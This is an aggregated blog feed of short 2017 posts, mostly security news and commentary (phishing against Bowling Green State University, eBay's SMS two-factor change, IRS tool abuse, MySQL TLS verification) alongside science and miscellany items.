Planet

Phishing 101 at the School of Hard Knocks

Postby BrianKrebs via Krebs on Security »

A recent, massive spike in sophisticated and successful phishing attacks is prompting many universities to speed up timetables for deploying mandatory two-factor authentication (2FA) — requiring a one-time code in addition to a password — for access to student and faculty services online. This is the story of one university that accelerated plans to require 2FA after witnessing nearly twice as many phishing victims in the first two-and-half months of this year than it saw in all of 2015.

Bowling Green State University in Ohio has more than 20,000 students and faculty, and like virtually any other mid-sized state school its Internet users are constantly under attack from scammers trying to phish login credentials for email and online services.

BGSU had planned later this summer to make 2FA mandatory for access to the school’s portal — the primary place where students register for classes, pay bills, and otherwise manage their financial relationship to the university.

That is, until a surge in successful phishing attacks resulted in several students having bank accounts and W-2 tax forms siphoned.

On March 1, 2017 all BGSU account holders were required to change their passwords, and on March 15, 2017 two-factor authentication (Duo) protection was placed in front of the MyBGSU portal [full disclosure: Duo is a longtime advertiser on KrebsOnSecurity].

Matt Haschak, director of IT security and infrastructure at BGSU, said the number of compromised accounts detected at BGSU has risen from 250 in calendar year 2015 to 1000 in 2016, and to approximately 400 in the first 75 days of 2017.

Left unchecked, phishers are on track to steal credentials from nearly 10 percent of the BGSU student body by the end of this year. The university has offered 2FA options for its portal access since June 2016, but until this month few students or faculty were using it, Haschak said.

“We saw very low adoption when it was voluntary,” he said. “And typically the people who adopted it were not my big security risks.”

Haschak said it’s clear that the scale and size of the phishing problem is hardly unique to BGSU.

“As I keep preaching to our campus community, this is not unique to BGSU,” Haschak said. “I’ve been talking a lot lately to my counterparts at universities in Ohio and elsewhere, and we’re all getting hit with these attacks very heavily right now. Some of the phishing scams are pretty good, but unfortunately some are god-awful, and I think people are just not thinking or they’re too busy in their day, they receive something on their phone and they just click it.”

Last month, an especially tricky phishing scam fooled several students who are also employed at the university into giving away their BGSU portal passwords, after which the thieves changed the victims’ direct deposit information so that their money went to accounts controlled by the phishers.

In other scams, the phishers would change the routing number for a bank account tied to a portal user, and then cancel that student’s classes near the beginning of a semester — thus kicking off a fraudulent refund.

One of the victims even had a fraudulent tax refund request filed in her name with the IRS as a result, Haschak said.

“They went in and looked at her W-2 information, which is also available via the portal,” he said.

While BGSU sends an email each time account information is changed, the thieves also have been phishing faculty and staff email accounts — which allows the crooks to delete the notification emails.

“The bad guys also went in and deleted the emails we sent, and then deleted the messages from the victim’s trash folder,” Haschak said.

Part of BGSU’s messaging to students and faculty about the new 2FA requirements for university portal access.
Ultimately, BGSU opted to roll out 2FA in a second stage for university email, mainly because of the logistics and support issues involved, but also because they wanted to focus on protecting the personally identifiable information in the BGSU portal as quickly as possible.

For now, BGSU is working on automating the opt-in for 2FA on university email. The 2FA system in front of its portal provides several 2FA options for students, including the Duo app, security tokens, or one-time codes sent via phone or SMS.

“If the numbers of compromised accounts keep increasing at the rate they are, we may get to that next level a lot sooner than our current roadmap for email access,” Haschak said.

2FA, also called multi-factor authentication or two-step verification, is a great way to dramatically improve the security of on online account — whether it’s at your bank, a file-sharing service, or your email. The idea is that even if thieves manage to snag your username and password — through phishing or via password-stealing malware — they still need access to that second factor to successfully impersonate you to the system.

Are you taking full advantage of 2FA options available to your various online accounts? Check out twofactorauth.org to find out where you might be able to harden your online account security.
Top

Daniel Suarez will do a Reddit AMA

Postby kris via The Isoblog. »

Daniel Suarez is planning a Reddit AMA on Monday, 24th of April. He’s in PST, and is asking for a preferred time on Twitter. Vote now.

Daniel Suarez Twitter AMA
Top

Number of road casualties in London

Postby kris via The Isoblog. »

The Guardian had in 2010 an article about road casualties in London:

There you will find that the fall of 299 brought the annual total down from 3,526 killed or seriously injured on London’s roads in 2008 to 3,227 in 2009.

That’s an eight percent fall, which is pretty significant statistically. However, in human terms, the fact that well over 3,000 people were killed or seriously injured in both 2008 and 2009 seems rather more significant. That’s nine or ten a day, including 204 people killed in 2008 and 184 in 2009.

We still consider such numbers normal loss of live.
Top

Chrome considers Symantec CA rogue

Postby kris via The Isoblog. »

Ryan Sleevi writes:

Since January 19, the Google Chrome team has been investigating a series of failures by Symantec Corporation to properly validate certificates. Over the course of this investigation, the explanations provided by Symantec have revealed a continually increasing scope of misissuance with each set of questions from members of the Google Chrome team; an initial set of reportedly 127 certificates has expanded to include at least 30,000 certificates, issued over a period spanning several years. […]

To balance the compatibility risks versus the security risks, we propose a gradual distrust of all existing Symantec-issued certificates, requiring that they be replaced over time with new, fully revalidated certificates, compliant with the current Baseline Requirements. […]

Given the nature of these issues, and the multiple failures of Symantec to ensure that the level of assurance provided by their certificates meets the requirements of the Baseline Requirements or Extended Validation Guidelines, we no longer have the confidence necessary in order to grant Symantec-issued certificates the “Extended Validation” status.

Top

Google Latitude is back, and there is no migration method

Postby kris via The Isoblog. »

Google Maps reintroduces their Latitude feature, in which you can share your current position with others in real time (compare with 2009).



According to the video you can share your position for a limited time and thankfully, permanently too. According to all documentation, there are no contact groups, so you have to add individuals one by one instead of integration with Contact Groups or Google plus circles.

And to make everything more painful, there is no migration of Location-sharing enabled Google plus groups (the non-funcitonal Latitude successor) to this feature, because “Fuck you!”.

I have no idea if this is mobile only or will also be visible with a proper UI on their Google Maps web interface.
Top

Electric car confusion

Postby kris via The Isoblog. »

Autoblog titles: The race for autonomous cars is over. Silicon Valley lost. The point they want to make is:

To paraphrase Elon Musk, Silicon Valley is learning that “Making rockets is hard, but making cars is really hard.” People outside of the auto industry tend to have a shallow understanding of how complex the business really is. They think all you have to do is design a car and start making it. But most startups never make it past the concept car stage because the move to mass production proves too daunting.

and

Yet, while companies like Google and Apple are giving up on making cars, they’re not giving up on the auto industry. There is another area where Silicon Valley could play a dominant role and it’s all about accessing car-based data.

It’s about the margins – making a thing gives you around 10% markup, making things out of data gives you much, much higher margins. This also frames the current discussions about privacy within the German government, and who is to own your data (hint: not you), especially when you drive.



But making software systems is also really, really hard. And an electric, self-driving car is much more a system, then a piece of software and then a piece of hardware. And Forbes sees the automotive industry not really in a strong position here, focusing on GM and Tesla.

In reality, I don’t see how GM isn’t making a meaningful strategic pivot to electric, especially compared to Tesla. Why?

By March 2017, GM sold a little over 2,000 Bolts, which retail around $37,000. By way of comparison, Tesla has delivered “over 183,000 Model S and X vehicles over the last four years,” according to Electrek. And then there’s the Model 3. Tesla has received over 400,000 customer deposits for its Model 3, which is priced at $35,000.

What GM does with the Ampera-e looks like a compliance stunt to get fleet consumption down, not like a credible electric move, to some: Greenwashing?

Read the whole thread
So what to make of it?

Making cars is hard. Making self-driving, electric cars is even harder, because it involves the hard tasks from making large physical machines and the hard tasks from making distributed, secure software systems.

Traditional car makers are not delivering (GM singled out above, but the others are guilty, too). And are not pivoting aggressively and fast enough into software and into electric. On the other hand, Silicon valley has largely pulled out of making large physical objects, and focuses on the data generated by drivers.

Only Tesla seems to move at speed.
Top

Sweden may drop building permit requirements for PV

Postby kris via The Isoblog. »

PV Magazine notes that sweden may drop building permit requirements for photovoltaic installations:

Sweden may launch probe into building permits for PV

Top

eBay Asks Users to Downgrade Security

Postby BrianKrebs via Krebs on Security »

Last week, KrebsOnSecurity received an email from eBay. The company wanted me to switch from using a hardware key fob when logging into eBay to receiving a one-time code sent via text message. I found it remarkable that eBay, which at one time was well ahead of most e-commerce companies in providing more robust online authentication options, is now essentially trying to downgrade my login experience to a less-secure option.

In early 2007, PayPal (then part of the same company as eBay) began offering its hardware token for a one-time $5 fee, and at the time the company was among very few that were pushing this second-factor (something you have) in addition to passwords for user authentication. In fact, I wrote about this development back when I was a reporter at The Washington Post:

“Armed with one of these keys, if you were to log on to your account from an unfamiliar computer and some invisible password stealing program were resident on the machine, the bad guys would still be required to know the numbers displayed on your token, which of course changes every 30 seconds. Likewise, if someone were to guess or otherwise finagle your PayPal password.”

The PayPal security key.
I’ve still got the same hardware token I ordered when writing about that offering, and it’s been working well for the past decade. Now, eBay is asking me to switch from the key fob to text messages, the latter being a form of authentication that security experts say is less secure than other forms of two-factor authentication (2FA).

The move by eBay comes just months after the National Institute for Standards and Technology (NIST) released a draft of new authentication guidelines that appear to be phasing out the use of SMS-based two-factor authentication. NIST said one-time codes that are texted to users over a mobile phone are vulnerable to interception, noting that thieves can divert the target’s SMS messages and calls to another device (either by social engineering a customer service person at the phone company, or via more advanced attacks like SS7 hacks).

I asked eBay to explain their rationale for suggesting this switch. I received a response suggesting the change was more about bringing authentication in-house (the security key is made by Verisign) and that eBay hopes to offer additional multi-factor authentication options in the future.

“As a company, eBay is committed to providing a safe and secure marketplace for our millions of customers around the world,” eBay spokesman Ryan Moore wrote. “Our product team is constantly working on establishing new short-term and long-term, eBay-owned factors to address our customer’s security needs. To that end, we’ve launched SMS-based 2FA as a convenient 2FA option for eBay customers who already had hardware tokens issued through PayPal. eBay continues to work on advancing multi-factor authentication options for our users, with the end goal of making every solution more secure and more convenient. We look forward to sharing more as additional solutions are ready to launch.”

I think I’ll keep my key fob and continue using that for two-factor authentication on both PayPal and eBay, thank you very much. It’s not clear whether eBay is also phasing out the use of Symantec’s VIP Security Key App, which has long offered eBay and PayPal users alike more security than a texted one-time code. eBay did not respond to specific questions regarding this change.

Although SMS is not as secure as other forms of 2FA, it is probably better than nothing. Are you taking advantage of two-factor authentication wherever it is offered? The site twofactorauth.org maintains a fairly comprehensive list of companies that offer two-step or two-factor authentication.
Top

FreeBSD Dutch Documentation Project

Postby Remko Lodder via Evilcoder.org ❄️ »

So. It had been a while before I had proper time to look into the Dutch translation efforts again.

History

Due to various reasons not discussed here, I was not able to see to a proper translation. Rene did a lot of work (thank you for that Rene!).

The PO system

First of all, i am going to discuss a bit about the PO system, which is a gettext way of doing translations. It chops texts into msgstr’s (message strings) and then translates those strings using msgid’s. Same lines are translated the same, this might be a good option, unless the context changed between the lines and then you might get ‘google translate’ kind of ways.

Back to the story…

After getting time again to see this through I noticed that we started using the “PO” system, using gettext. Our handbook (for example) is now translated into one huge book.xml file which is then cut into msgstr’s that can be translated to msgid’s. For this I use the poedit application (the PRO version) so that I have counters and translation suggestions from the online Translation Memory(TM) that we all develop. I also contribute the FreeBSD translations back to the TM so that everyone can profit from it.

I am now first synchronising the Glossary because that didn’t change much with the current online translation and working my way back to what had been translated already and translating the missing bits and pieces in between. Mike (co worker at Snow) also did a tremendous job in getting this into better shape the last year which had not yet been merged back to the online variants because it was not yet complete. I can use that information though to generate a manual handbook variant of that version and use that to even further use the current translation effort into the gettext/po system.

Biting the bullet

As one of the first translation teams to use this, I expect to hit some rocks on the road. For example, there are lines that do not need translation, mailing list names are the same in every language, perhaps the description changes but not the ‘realnames’. Same goes for my entity (&a.remko) which does not change, nor my PGPkey. And if those things change, they require changing over all translation efforts as well as the original english version. We are looking into a way to ‘ignore’ them for the po system but include them when building. So that pgpkeys and such are always up to date.

I also had been discussing this with Vaclav the developer of poedit, and he mentioned that it does not matter much, because when a line changes and you update the po, those lines will be invalidated and need ‘retranslation’ for the entire string. So that all gets us in interesting situations that we did not encounter before. I am biting the bullet myself after we have discussed this a few years ago and I hope that the entire project can benefit from that.

Alternative options, pre-translate, merge current translations automatically?

And yes, a valid question would be, cannot you merge the current translated information into the po system automatically. If every word was on the exact same spot and line, yes this might be an option. Sadly because of grammer and different wording (longer/shorter) this changes rapidly from line 1 already and is thus not easily done. If you have suggestions however, we are always willing to listen. Please join us on ‘translators@FreeBSD.org’ so that we can discuss those things better :-).
Top

Kobo readers using the internet

Postby Remko Lodder via Evilcoder.org ❄️ »

So I have this situation, where I couldn’t get my kobo reader to connect to the internet and fetch updates and/or use kobo+ for example.

I started debugging with Ubiquiti ages ago to see where the problem lies. In the meantime I was unable to continue with this, but I had an interesting thought yesterday. I sniffed the traffic from the hardware (mac) address of the ereader and noticed that it tried to resolve: www.msftncsi.com and fetch /ncsi.txt. The site is a microsoft network connection information page that informs microsoft systems whether or not an active internet connection is seen.

Somehow it seems that Kobo is also using that for it’s android based readers as well. Without it, the network connection just disconnects and does nothing. That is somewhat upsetting because the device is just perfectly able to connect to the network(s) and has relative free internet access. One thing is that I filter on DNS responses and exclude known malware/spam hosts and analytics sites like google. This reduces the amount of advertorials on the internet and bogus trackers. It seems that msftncsi.com is also on that list and thus gets an NXDOMAIN when querying for it.

I do not entirely understand why an ereader would need this kind of information before being able to connect to the internet. The device should associate with a WiFi access point and get an address and the like. Whether or not that gives continued access to the internet is something that is a next step. So instead of giving up, it could just mark the WiFi symbol with an exclamation mark (!) to report that something might not work and/or just try to connect to the kobo internet environment. That would be more common use of the internet then depending on an internet file which might be blocked (such as in my case).

For now I changed my caching mikrotik’s to include msftncsi.com as a static entry and point that to my webserver and service the file instead. That makes sure the Kobo can connect to the environment and gives me full access over that file instead of some bogus remote site that might do nasty things (without me knowing).

Ofcourse I asked (nice and polite) Kobo to change this interesting behaviour.
Top

Tractor hacking and the right to repair

Postby kris via The Isoblog. »

Vice Motherboard has an article about US farmers hacking their John Deere tractors, because the software in the machinery comes with very limiting conditions.

To avoid the draconian locks that John Deere puts on the tractors they buy, farmers throughout America’s heartland have started hacking their equipment with firmware that’s cracked in Eastern Europe and traded on invite-only, paid online forums.[…]

“If things could get better, [companies like John Deere] should be forced to freely distribute the same software dealers have,” they said. “And stop locking down [Engine Control Module] reading functionality. They do this to force you to use their services, which they have a 100 percent monopoly on.”[…]

“What happens in 20 years when there’s a new tractor out and John Deere doesn’t want to fix these anymore?” the farmer using Ukrainian software told me. “Are we supposed to throw the tractor in the garbage, or what?”

 

Top


10 reasons not to do HTTPS interception

Postby kris via The Isoblog. »

Marnix Dekker has an article on HTTPS interception as it is being done in some workplaces.

He lists:

  • Are you serious? We worked so hard to make the web more secure and you are fucking it up.
  • HSTS, you are breaking it.
  • Blinds the browser and the user, because you re-encrypt with wildcard certs.
  • Disrupts personal use.
  • Breaks pinning and CT.
  • Breaks with consumerization.
  • Disrupts BYOD.
  • Discourages good user practices.
  • Limited benefits.
  • and finally: Hard shell, soft inside is not going to work.
Top



Network attacks on MySQL, Part 3: What do you trust?

Postby Daniël van Eeden via Daniël's Database Blog »

In my previous blogs I told you to enable SSL/TLS and force the connection to be secured. So I followed my advice and did forced SSL. Great!

So now everything is 100% secure isn't it?

No it isn't and I would never claim anything to be 100% secure.

There are important differences in the SSL/TLS implementations of browers and the implementation in MySQL. One of these differences is that your browser has a trust store with a large set of trusted certificate authorities. If the website you visit has SSL enabled then your browser will check if the certificate it presents is signed by a trusted CA. MySQL doesn't use a list of trusted CA's, and this makes sense for many setups.

The key difference is that a website has clients (browsers) which are not managed by the same organization. And for MySQL connections the set of clients is often much smaller are more or less managed by one organization. Adding a CA for a set of MySQL connections if ok, adding a CA for groups of websites is not.

The result is that a self signed certificate or a certificate which is signed by an internal CA is ok. An public CA also won't issue a certificate for internal hostnames, so if your server has an internal hostname this isn't even an option. Note that the organization running public CA's sometimes offer a service where they manage your internal CA, but then your CA is not signed by the public CA.

But if you don't tell your MySQL client or application which CA's it should trust it will trust all certifictes. This allows an attacker to use a man-in-the-middle proxy which terminates the SSL connection between your client and the proxy and setup another connection to the server, which may or may not be useing SSL.

To protect against this attack:

  1. Use the --ssl-ca option for the client to specify the CA certificate.
  2. Use the --ssl-mode=VERIFY_CA option for the client.
You could use a CA for each server or a CA you use for all MySQL servers in your organization. If you use multiple CA's then you should bundle them in one file or use --ssl-capath instead.
Top

Student Aid Tool Held Key for Tax Fraudsters

Postby BrianKrebs via Krebs on Security »

Citing concerns over criminal activity and fraud, the U.S. Internal Revenue Service (IRS) has disabled an automated tool on its Web site that was used to help students and their families apply for federal financial aid. The removal of the tool has created unexpected hurdles for many families hoping to qualify for financial aid, but the action also eliminated a key source of data that fraudsters could use to conduct tax refund fraud.

Last week, the IRS and the Department of Education said in a joint statement that they were temporarily shutting down the IRS’s Data Retrieval Tool. The service was designed to make it easier to complete the Education Department’s Free Application for Federal Student Aid (FAFSA) — a lengthy form that serves as the starting point for students seeking federal financial assistance to pay for college or career school.

The U.S. Department of Education’s FAFSA federal student aid portal. A notice about the closure of the IRS’s data retrieval tool can be seen in red at the bottom right of this image.
In response to requests for comment, the IRS shared the following statement: “As part of a wider, ongoing effort at the IRS to protect the security of data, the IRS decided to temporarily suspend their Data Retrieval Tool (DRT) as a precautionary step following concerns that information from the tool could potentially be misused by identity thieves.”

“The scope of the issue is being explored, and the IRS and FSA are jointly investigating the issue,” the statement continued. “At this point, we believe the issue is relatively isolated, and no additional action is needed by taxpayers or people using these applications. The IRS and FSA are actively working on a way to further strengthen the security of information provided by the DRT. We will provide additional information when we have a specific timeframe for returning the DRT or other details to share.”

The removal of the IRS’s tool received relatively broad media coverage last week. For example, a story in The Wall Street Journal notes that the Treasury Inspector General for Tax Administration — which provides independent oversight of the IRS — “opened a criminal investigation into the potentially fraudulent use of the tool.”

Nevertheless, I could not find a single publication that sought to explain precisely what information identity thieves were seeking from this now-defunct online resource. Two sources familiar with the matter but who asked to remain anonymous because they were not authorized to speak on the record told KrebsOnSecurity that identity thieves were using the IRS’s tool to look up the “adjusted gross income” (AGI), which is an individual or family’s total gross income minus specific deductions.

Anyone completing a FAFSA application will need to enter the AGI as reported on the previous year’s income tax return of their parents or guardians. The AGI is listed on the IRS-1040 forms that taxpayers must file with the IRS each year. The IRS’s online tool was intended as a resource for students who needed to look up the AGI but didn’t have access to their parents’ tax returns.

Eligible FAFSA applicants could use the IRS’s data retrieval tool to populate relevant fields in the application with data pulled directly from the IRS. Countless college Web sites explain how the tool works in more detail; here’s one example (PDF).

As it happens, the AGI is also required to sign and validate electronic tax returns filed with the IRS. Consequently, the IRS’s data retrieval tool would be a terrific resource to help identity thieves successfully file fraudulent tax refund requests with the agency.

A notice from the IRS states that the adjusted gross income (AGI) is needed to validate electronically-filed tax returns.
Tax-related identity theft occurs when someone uses a Social Security number (SSN) — either a client’s, a spouse’s, or dependent’s — to file a tax return claiming a fraudulent refund. Thieves may also use a stolen Employer Identification Number (EIN) from a business client to create false Forms W-2 to support refund fraud schemes. Increasingly, fraudsters are simply phishing W-2 data in large quantities from human resource professionals at a variety of organizations. However, taxpayer AGI information is not listed on W-2 forms.

Victims usually first learn of the crime after having their returns rejected because scammers beat them to it. Even those who are not required to file a return can be victims of refund fraud, as can those who are not actually due a refund from the IRS.

This would not be the first time tax refund fraudsters abused an online tool made available by the IRS. During the height of tax-filing season in 2015, identity thieves used the irs.gov’s “Get Transcript” feature to glean salary and personal information they didn’t already have on targeted taxpayers. In May 2015, the IRS suspended the Get Transcript feature, citing its abuse by fraudsters and noting that some 100,000 taxpayers may have been victimized as a result.

In August 2015, the agency revised those estimates up to 330,000, but in February 2016, the IRS again more than doubled its estimate, saying the number of taxpayers targeted via abuse of the Get Transcript tool was probably closer to 724,000.

The IRS re-enabled its Get Transcript service last summer, saying it had fortified the system with additional security safeguards — such as requiring visitors to supply a mobile phone number that is tied to the applicant’s name.

Now, the IRS is touting its new and improved Get Transcript service as an alternative method for obtaining the information needed to complete the FAFSA.

“If you did not retain a copy of your tax return, you may be able to access the tax software you used to prepare your return or contact your tax preparer to obtain a copy,” the IRS said in its advisory on the shutdown of its data retrieval tool. “You must verify your identity to use this tool. You also may use Get Transcript by Mail or call 1-800-908-9946, and a transcript will be delivered to your address of record within five to 10 days.”

The IRS advises those who still need help completing the FAFSA to visit StudentAid.gov/fafsa or call 1-800-4FED-AID (1-800-433-3243).

DON’T BE THE NEXT VICTIM

Here are some steps you can take to make it less likely that you will be the next victim of tax refund fraud:

-File before the fraudsters do it for you – Your primary defense against becoming the next victim is to file your taxes at the state and federal level as quickly as possible. Remember, it doesn’t matter whether or not the IRS owes you money: Thieves can still try to impersonate you and claim that they do, leaving you to sort out the mess with the IRS later.

-Get on a schedule to request a free copy of your credit report. By law, consumers are entitled to a free copy of their report from each of the major bureaus once a year. Put it on your calendar to request a copy of your file every three to four months, each time from a different credit bureau. Dispute any unauthorized or suspicious activity. This is where credit monitoring services are useful: Part of their service is to help you sort this out with the credit bureaus, so if you’re signed up for credit monitoring make them do the hard work for you.

-File form 14039 and request an IP PIN from the government. This form requires consumers to state they believe they’re likely to be victims of identity fraud. Even if thieves haven’t tried to file your taxes for you yet, virtually all Americans have been touched by incidents that could lead to ID theft — even if we just look at breaches announced in the past year alone.

Consider placing a “security freeze” on one’s credit files with the major credit bureaus. See this tutorial about why a security freeze — also known as a “credit freeze,” may be more effective than credit monitoring in blocking ID thieves from assuming your identity to open up new lines of credit. While it’s true that having a security freeze on your credit file won’t stop thieves from committing tax refund fraud in your name, it would stop them from fraudulently obtaining your IP PIN.

Monitor, then freeze. Take advantage of any free credit monitoring available to you, and then freeze your credit file with the four major bureaus. Instructions for doing that are here.
Top

WireGuard in Google Summer of Code

Postby via Nerdling Sapple »

WireGuard is participating in Google Summer of Code 2017. If you're a student who would like to be funded this summer for writing interesting kernel code, studying cryptography, building networks, or working on a wide variety of interesting problems, then this might be appealing. The program opened to students on March 20th. If you're applying for WireGuard, choose "Linux Foundation" and state in your proposal that you'd like to work on WireGuard with "Jason Donenfeld" as your mentor.
Top

Sensitive Issues, according to YouTube

Postby kris via The Isoblog. »

Clearly, some things are more sensitive than others for YouTube.

Brianna Wu

This is in response to YouTube Creators saying:

We are so proud to represent LGBTQ+ voices on our platform — they’re a key part of what YouTube is all about. The intention of Restricted Mode is to filter out mature content for the tiny subset of users who want a more limited experience. LGBTQ+ videos are available in Restricted Mode, but videos that discuss more sensitive issues may not be. We regret any confusion this has caused and are looking back into your concerns. We appreciate your feedback and passion for making YouTube such an inclusive, diverse, and vibrant community.

Youtube Creators
(This needs to be read in the context of YouTube being a platform for the American Nazi Movement, their GamerGate subwing and the likes)

(This also needs to be read in the context of YouTube playing out brand ads in racist or mysogynistic videos, which has led to advertisers boycotting YouTube. That boycott has hit them, so they were forced to react)
Top

Tumblr of the Day: #gopdnd

Postby kris via The Isoblog. »

If you haven’t done yet, check out #gopdnd on Twitter.

Top

Malvertising – we have only seen the beginning

Postby kris via The Isoblog. »

Netzpolitik.org has an article (in German) in which they are interviewing IT-Security Consultant Thorsten Schröder on Adblockers, wasted capped mobile bandwidth and Malvertising.

netzpolitik.org: Neben dem Schutz vor Malware, welche weiteren Gründe für die Nutzung von Adblockern findest Du wichtig?

Thorsten Schröder: Wenn wir als Malware all das klassifizieren, was Nutzer ausspioniert, täuscht, kompromittiert oder finanziell schädigt, haben wir im Grunde schon mal eine ganze Reihe an Gründen abgehakt. Nutzer müssen die Möglichkeit haben, selbstbestimmt das Schutzniveau ihres Computers bestimmen zu dürfen. Hat die Bundesregierung vielleicht mal das Bundesamt für Sicherheit in der Informationstechnik (BSI) gefragt? Es wäre eine gute Gelegenheit für das BSI, zu zeigen, was es drauf hat.

»netzpolitik.org: Besides the protection against malware, what other reasons for using Adblockers are important to you?

Thorsten Schröder: If we classify things as malware which spy on users, deceive them, compromise them or harm them financially, we have in principle covered all reasons. Users you have the right to determine the level of protection their computers need. Did our administration ask their Bundesamt für Sicherheit in der Informationstechnik (BSI)? It would be a good opportunity for the BSI to show what they can do.«



The article goes on to discuss numbers and percentages. That is actually not helpful.

The numbers stated are by construction too low, and that can not be helped. Also, the numbers are ultimately irrelevant, because Malvertisements are not distributed randomly and evenly.

The point being that Ad-Networks generate their value not only from the raw number of eyeballs reached, but quite a lot comes from being able to reach the right kind of eyeballs. The better the Ad-Network, the better their targetting.

10.000 drive-by impressions are worth quite a lot more when I can make sure that all 10.000 of them hit explotable XP/MSIE 6 combos, even if the relative number of installations left in world with these characteristics is quite low.

And 10.000 impressions for ads containing this or that scam are worth a lot more, when I can select an audience for these 10.000 expressions that is badly educated, old or otherwise wrangling to stay on top of this Internet thing and thus more likely to fall for it.

Targeted advertising and Malware Distribution are a match made in hell, they amplify each other synergetically.

This is an effect we need to push more to the front of this discussion. Content Sites are responsible for the ads integrated into their content and shown “as their own”. Ad Networks are responsible for the way the selectors they offer are being used. The German construct of Störerhaftung works in all directions, not just against private Wifi offerings.
Top

We have bread again!

Postby kris via The Isoblog. »

Like every German living abroad, I suffer from the bread question. But things are clearing up, the most wunderful wife of all has her sourdough going again, and this is a fabulous batch of tiny sourdough Ciabatta.

Top

Making Adblock illegal in Germany?

Postby kris via The Isoblog. »

If you can read German, check out Torsten Kleinz posting on Google plus. He has been in the Ausschuß für Kultur und Medien of Parliament of Nordrhein-Westfalen, and explaining ad auctions and ad blockers to members of the parliament.

The protocol (PDF, german language) is available here. It’s a long read, but worth your time.
Top

Breaking the law in traffic…

Postby kris via The Isoblog. »

JTLU Paper
The Journal of Transport and Land Use has a rather lengthy article on people breaking traffic laws. TL;DR: Everybody in traffic is breaking the law, but for different reasons.



The JTLU paper finds:

When including driving and pedestrian scenario responses—such as how often respondents drive over the speed limit or jaywalk—100% of our sample population admitted to some form of law-breaking in the transportation system (i.e., everybody is technically a criminal).

When disaggregating by mode, 95.87% of bicyclists, 97.90% of pedestrians, and nearly all drivers (99.97%) selected responses that would be considered illegal. The rationale for why these road users were breaking the law, however, differed by mode. Drivers and pedestrians that break the rules of the road tended to do so to save time (77% and 85% of drivers and pedestrians, respectively). However, bicyclists report disregarding the rules of road for other reasons.

The most prevalent response as to why bicyclists break the rules was “personal safety” with more than 71% of respondents citing that as a reason. Saving energy came in second for bicyclists (56%) followed by saving time (50%). Increasing one’s visibility was the fourth most cited response (47%) for bicyclists breaking the law.

While the overwhelming majority of bicyclists break the rules, the open response answers suggest that most do so in situations where little harm would come to themselves or others and are often motivated by concerns for their own safety because they feel like an afterthought in a car-dominated transportation system.

That ties in nicely with the findings in We learned a few things about Cycle Path design in the last 25 years elsewhere in this blog.
Top

Bacteria talk…

Postby kris via The Isoblog. »

Disrupting Bacterial Chatter
Bonnie Bassler, a molecular biologist at Princeton University discovered that Bacteria can communicate, across species borders, using signal molecules. Synchronisation between individuals in a biofilm, Quorum Sensing, can launch attacks that overwhelm an immune system.


It’s an important mechanism to bacteria, so it even has a genetic backup, multiple redunant communication channels. And at least one of them works across species barriers. She says in Discover:

What they first do is they scan the environment. And they’re asking the simplest question: “Am I alone or am I in a group?” They just look for any quorum-sensing molecule. Then, the more sophisticated question that I think they ask is, “Who is that?”

They can say, “You are my absolute identical twin.” They can say, “You’re my extended family.” And then they say, “You’re some other species.” They’re not just counting. There’s information encoded in these molecules that tells a bacterium who that neighbor is — how related they are. And depending on the ratio of those three molecules, they understand whether their family is winning or losing.

Sabotaging Quorum Sensing in biofilms can help fighting dangerous infections by disabling the communication and sensing methods of the bacteria.
Top

Restoring Neuroplasticity

Postby kris via The Isoblog. »

Children are learning much faster than you do. That’s because as you grow up, the brain turns down Neuroplasticity to protect what you have already learned from newer, potentially harmful influence. It used to make sense.

Now, how about some drugs that turn your brains ability to learn new tricks fast, on demand? The New Scientist knows:

Until the age of 7 or so, the brain goes through several “critical periods” during which it can be radically changed by the environment. During these times, the brain is said to have increased plasticity. […]

Hensch’s team has shown that several physiological changes close the door on plasticity in animals. A key player is histone deacetylase (HDAC), an enzyme that acts on DNA and makes it harder to switch genes on or off.

And they used a HDAC inhibitor on humans, with considerable success.
Top

No such thing as a wilderness, part II

Postby kris via The Isoblog. »

Science Daily writes:

New research investigating the transition of the Sahara from a lush, green landscape 10,000 years ago to the arid conditions found today, suggests that humans may have played an active role in its desertification.

[…] As more vegetation was removed by the introduction of livestock, it increased the albedo (the amount of sunlight that reflects off the earth’s surface) of the land, which in turn influenced atmospheric conditions sufficiently to reduce monsoon rainfall. The weakening monsoons caused further desertification and vegetation loss, promoting a feedback loop which eventually spread over the entirety of the modern Sahara.



Similar effects are being discussed in The Science Show of January 21, about current day South Western Australia:

Europeans began altering the landscape following settlement of the region in 1829. Vast areas of eucalypt forest were cleared for crops and pasture. Cleared land produces less turbulence as storms move across the landscape. And fewer big trees means less transpiration. The atmosphere is drier, the storms slip by, with less rain produced. Now global effects mean cold fronts are passing further south, some missing the continent altogether. The water table is falling by half a metre a year. If the trend continues, there are predictions of a 17% drop in agricultural production in future decades.

Top

No such thing as a wilderness?

Postby kris via The Isoblog. »

Some 40 authors are listed in the title of Persistent effects of pre-Columbian plant domestication on Amazonian forest composition in Science. The TL;DR is: The Amazonas Rain Forest is a 10.000 year old garden, which has been left untended for the last 500 years after the Amerindian genocide of European conquistadors.



The extent to which pre-Columbian societies altered Amazonian landscapes is hotly debated. We performed a basin-wide analysis of pre-Columbian impacts on Amazonian forests by overlaying known archaeological sites in Amazonia with the distributions and abundances of 85 woody species domesticated by pre-Columbian peoples. Domesticated species are five times more likely than nondomesticated species to be hyperdominant.

Across the basin, the relative abundance and richness of domesticated species increase in forests on and around archaeological sites. In southwestern and eastern Amazonia, distance to archaeological sites strongly influences the relative abundance and richness of domesticated species. Our analyses indicate that modern tree communities in Amazonia are structured to an important extent by a long history of plant domestication by Amazonian peoples.

 The full article is unfortunately behind a pay wall.
Top

Salted Doorknobs kill MRSA

Postby kris via The Isoblog. »

Salted Doorknobs kill MRSA
Says this article at The Atlantic:

Superbugs like Methicillin-resistant Staphylococcus aureus, or MRSA, have wreaked havoc on the health-care system in recent years. […] How do you stop them? Frequent hand washing is one option, but that requires a behavior change, which can be difficult, even for hospital staff. Another option is to coat those frequently fondled objects most likely to carry the bugs—doorknobs, bed rails, toilet handles—with a special anti-microbial surface, like copper. […] Whitlock found that salt killed off the bug 20 to 30 times faster than the copper did, reducing MRSA levels by 85 percent after 20 seconds, and by 94 percent after a minute.

Top

If you can find Nemo, the reef is already dying

Postby kris via The Isoblog. »

The Atlantic has an article about intact vs. overfished coral reefs.

